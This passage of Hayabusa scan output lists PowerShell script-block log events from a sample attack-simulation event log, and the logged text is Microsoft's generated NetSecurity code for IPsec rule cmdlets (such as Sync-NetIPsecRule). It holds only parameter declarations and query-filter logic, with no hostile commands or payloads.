'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] 
[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, 
$script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHas",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"BeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } 
if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains 
